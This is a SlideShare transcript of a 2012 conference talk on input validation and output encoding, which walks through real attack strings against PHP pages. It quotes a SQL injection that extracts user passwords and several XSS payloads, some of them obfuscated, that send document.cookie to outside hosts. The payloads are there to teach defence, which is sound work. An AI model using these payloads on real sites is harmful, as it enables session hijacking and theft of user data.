Is What You Get, What You Expect to Get?     Philip Tellis / philip@lognormal.com                 ConFoo.ca / 2012-03-01  ...
IWYGWYETGConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   2
$ finger philip       Philip Tellis       philip@lognormal.com       @bluesmoon       geek - paranoid - speedfreak       co...
WARNING !This presentation may contain unreadable code. Attempting to read itis probably not worthwhile. Definitely not at ...
How do you distinguish code from data?    ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   5
< > ’ "  & % ‘ ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   6
Failure to tell the difference. . .                ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   7
Note: This talk is NOT about XSS or SQLi,        but it might seem like it     ConFoo.ca / 2012-03-01   Is What You Get, W...
Let’s look at a few examplesConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   9
http://xxyyzz.com/forms/contact_form.asp?i=  0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28  %27%3c%28%20%27%2buserId%29,%28f...
http://xxyyzz.com/forms/contact_form.asp?i=  0’      UNION   ALL   SELECT  1,2,3,4,5, (  ’    < (      ’ + userId ) , ( fi...
Expected a positive integer, but got more than that      ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?...
<?php$id = htmlspecialchars($_GET[ ’id’ ]);?>...value : <?php echo ($id) ? $id : ’null’; ?>     This is JavaScript code ge...
id=%3Cscript%3Edocument.location=%27  http://www.silic0n.byethost8.com/index.php  ?isr=%27%20+escape(document.cookie)  %3C...
id=%3Cscript%3Edocument.location=%27  http://www.silic0n.byethost8.com/index.php  ?isr=%27%20+escape(document.cookie)  %3C...
id=%3Cscript%3Edocument.location=%27  http://www.silic0n.byethost8.com/index.php  ?isr=%27%20+escape(document.cookie)  %3C...
Expected a positive integer, but got more than that      ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?...
<a     <?php echo ’href=/stock_price?f=’ .          htmlspecialchars($_GET[’f’]);     ?>>           ConFoo.ca / 2012-03-01...
<a     <?php echo ’href=/stock_price?f=’ .          htmlspecialchars($_GET[’f’]);     ?>>           ConFoo.ca / 2012-03-01...
use the quotes luke<a                    "     <?php echo ’href=/stock_price?f=’ .          htmlspecialchars($_GET[’f’]); ...
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,1...
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,1...
/stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,1...
The char codes translate to:<img src=x onerror=(document.location=’  http://standard33.freehostia.com/CS/lg.php?info=’  +e...
Expected a stock symbol, but got more than that    ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   19
<?php  $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElem...
<?php  $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElem...
<?php  $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElem...
<?php  $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElem...
<?php  $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElem...
<?php  $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElem...
h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020  onerroru003du0022alert(u0027xssu0027)          ConFoo.ca / 2012-03-01...
h=   "      >        < img            src   =              " foo          "  onerror    =        " alert(        ’   xss  ...
h="><img src="foo"  onerror="alert(’xss’)          ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   21
Expected a hostname, but got something completely different           ConFoo.ca / 2012-03-01   Is What You Get, What You E...
Dear IE6   <input value="[e0]"> "onmouseover=alert(0) >            ConFoo.ca / 2012-03-01   Is What You Get, What You Expe...
Dear IE6   <input value="[e0]"> "onmouseover=alert(0) >       That’s 0xe0, start of 3 byte seq            ConFoo.ca / 2012...
Dear IE6   <input value=""onmouseover=alert(0) >            ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to G...
Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   24
So what’s the common theme here?ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   25
Should I be Validating Input or Encoding Output?     ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   26
They solve two different problems, and you need both       ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Ge...
Output Encoding (done automatically by your framework)            protects your users from XSS         ConFoo.ca / 2012-03...
Input Validation is a data quality issueConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   29
Is the input you get from a user of the type and range               that you expect it to be?          ConFoo.ca / 2012-0...
Sometimes it results in back end code injection    ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   31
But it always results in bad dataConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   32
Bonus Example: This hit me in production yesterday      ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get? ...
regex to check if text was a subdomain of a known domain   re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’);   re.exec(ref) ...
Sometimes IE8 will serve requests from a .mht file   mhtml:file://C:Usersblah-blah-blah.mht              ConFoo.ca / 2012-0...
I expected the regex to reject this textConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   36
What I got was 100% CPU spent in regex backtracking       ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get...
;(ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   38
Unrelated Bonus Example: From a WordPress theme      ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   39
<?php   $value=htmlspecialchars($_GET[’value’], ENT_QUOTES);?><input type="text"    value="<?php echo $value ?>"    onfocu...
<input type="text"   value="'+alert(/xss/)+'"   onfocus="if(this.value==’'+alert(/xss/)+'’)               {this.value = ’’...
<input type="text"   value="'+alert(/xss/)+'"   onfocus="if(this.value==’'+alert(/xss/)+'’)               {this.value = ’’...
<input type="text"   value="'+alert(/xss/)+'"   onfocus="if(this.value==’’    +alert(/xss/)+                              ...
I have no idea what was expected here     ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   42
Questions?ConFoo.ca / 2012-03-01   Is What You Get, What You Expect to Get?   43
Contact me      Philip Tellis      philip@lognormal.com      @bluesmoon      geek - paranoid - speedfreak      co-founder ...
Upcoming SlideShare
Loading in...5
×

Input sanitization

3,305

Published on

Input validation is all about defining the type and range of your inputs and making sure they validate.

Published in: Technology, Spiritual
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
3,305
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
12
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Input sanitization

  1. 1. Is What You Get, What You Expect to Get? Philip Tellis / philip@lognormal.com ConFoo.ca / 2012-03-01 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
  2. 2. IWYGWYETGConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 2
  3. 3. $ finger philip Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 3
  4. 4. WARNING !This presentation may contain unreadable code. Attempting to read itis probably not worthwhile. Definitely not at 08:30. ScreamingWTF!!1! probably is. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 4
  5. 5. How do you distinguish code from data? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 5
  6. 6. < > ’ " & % ‘ ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 6
  7. 7. Failure to tell the difference. . . ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 7
  8. 8. Note: This talk is NOT about XSS or SQLi, but it might seem like it ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 8
  9. 9. Let’s look at a few examplesConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 9
  10. 10. http://xxyyzz.com/forms/contact_form.asp?i= 0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28 %27%3c%28%20%27%2buserId%29,%28firstname %2b%27%20%27%2blastname%29,%28address%2b %27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16, %28email%2b%27%20-Password:%20%27%27 %2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21, 22,23,24,25,26,27,28,29,30%20FROM%20 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 10
  11. 11. http://xxyyzz.com/forms/contact_form.asp?i= 0’ UNION ALL SELECT 1,2,3,4,5, ( ’ < ( ’ + userId ) , ( firstname + ’ ’ + lastname ) , ( address + ’ city: ’ + city ) ,9,10,11,12,13,14,15,16, ( email + ’ -Password: ’ ’ + userpwd + ’ ) > ’ ) ,18,19,20,21, 22,23,24,25,26,27,28,29,30 FROM ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 11
  12. 12. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 12
  13. 13. <?php$id = htmlspecialchars($_GET[ ’id’ ]);?>...value : <?php echo ($id) ? $id : ’null’; ?> This is JavaScript code generated by PHP ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 13
  14. 14. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  15. 15. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  16. 16. id=%3Cscript%3Edocument.location=%27 http://www.silic0n.byethost8.com/index.php ?isr=%27%20+escape(document.cookie) %3C/script%3E $id should have been an integer A bug in this attack rendered it unsuccessful ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 14
  17. 17. Expected a positive integer, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 15
  18. 18. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?>> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  19. 19. <a <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?>> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  20. 20. use the quotes luke<a " <?php echo ’href=/stock_price?f=’ . htmlspecialchars($_GET[’f’]); ?>> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 16
  21. 21. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  22. 22. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  23. 23. /stock_price?f=ACDD%20STYLE=x:expression( document.write(String.fromCharCode( 60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99, 117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47, 115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99, 111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97, 112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62))) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 17
  24. 24. The char codes translate to:<img src=x onerror=(document.location=’ http://standard33.freehostia.com/CS/lg.php?info=’ +escape(document.cookie))> $f was html encoded, but used unquoted as an attribute value. Remember that spaces are never encoded. ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 18
  25. 25. Expected a stock symbol, but got more than that ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 19
  26. 26. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElementById("l");div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  27. 27. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElementById("l");div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  28. 28. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElementById("l");div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  29. 29. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElementById("l");div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  30. 30. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElementById("l");div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  31. 31. <?php $host=htmlspecialchars($_REQUEST[’h’], ENT_QUOTES);?>...var host = "<?php echo $host ?>";var div = document.getElementById("l");div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>"; Notice the different contexts What’s special (meta) to one language but not the other? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 20
  32. 32. h=u0022u003eu003cimgu0020srcu003du0022foou0022u0020 onerroru003du0022alert(u0027xssu0027) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  33. 33. h= " > < img src = " foo " onerror = " alert( ’ xss ’ ) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  34. 34. h="><img src="foo" onerror="alert(’xss’) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 21
  35. 35. Expected a hostname, but got something completely different ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 22
  36. 36. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  37. 37. Dear IE6 <input value="[e0]"> "onmouseover=alert(0) > That’s 0xe0, start of 3 byte seq ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  38. 38. Dear IE6 <input value=""onmouseover=alert(0) > ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 23
  39. 39. Expected valid UTF-8, got invalid UTF-8 ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 24
  40. 40. So what’s the common theme here?ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 25
  41. 41. Should I be Validating Input or Encoding Output? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 26
  42. 42. They solve two different problems, and you need both ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 27
  43. 43. Output Encoding (done automatically by your framework) protects your users from XSS ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 28
  44. 44. Input Validation is a data quality issueConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 29
  45. 45. Is the input you get from a user of the type and range that you expect it to be? ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 30
  46. 46. Sometimes it results in back end code injection ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 31
  47. 47. But it always results in bad dataConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 32
  48. 48. Bonus Example: This hit me in production yesterday ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 33
  49. 49. regex to check if text was a subdomain of a known domain re=new RegExp(’^(?:[^.]+.)*’ + dom + ’$’, ’i’); re.exec(ref) ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 34
  50. 50. Sometimes IE8 will serve requests from a .mht file mhtml:file://C:Usersblah-blah-blah.mht ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 35
  51. 51. I expected the regex to reject this textConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 36
  52. 52. What I got was 100% CPU spent in regex backtracking ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 37
  53. 53. ;(ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 38
  54. 54. Unrelated Bonus Example: From a WordPress theme ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 39
  55. 55. <?php $value=htmlspecialchars($_GET[’value’], ENT_QUOTES);?><input type="text" value="<?php echo $value ?>" onfocus="if(this.value==’<?php echo $value ?>’) {this.value = ’’;}" /> ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 40
  56. 56. <input type="text" value="'+alert(/xss/)+'" onfocus="if(this.value==’'+alert(/xss/)+'’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  57. 57. <input type="text" value="'+alert(/xss/)+'" onfocus="if(this.value==’'+alert(/xss/)+'’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  58. 58. <input type="text" value="'+alert(/xss/)+'" onfocus="if(this.value==’’ +alert(/xss/)+ ’’) {this.value = ’’;}" /> Inside an on* handler, html entities are decoded before they are passed on to JavaScript ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 41
  59. 59. I have no idea what was expected here ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 42
  60. 60. Questions?ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 43
  61. 61. Contact me Philip Tellis philip@lognormal.com @bluesmoon geek - paranoid - speedfreak co-founder Log-Normal http://bluesmoon.info/ slideshare.net/bluesmoon ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 44
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×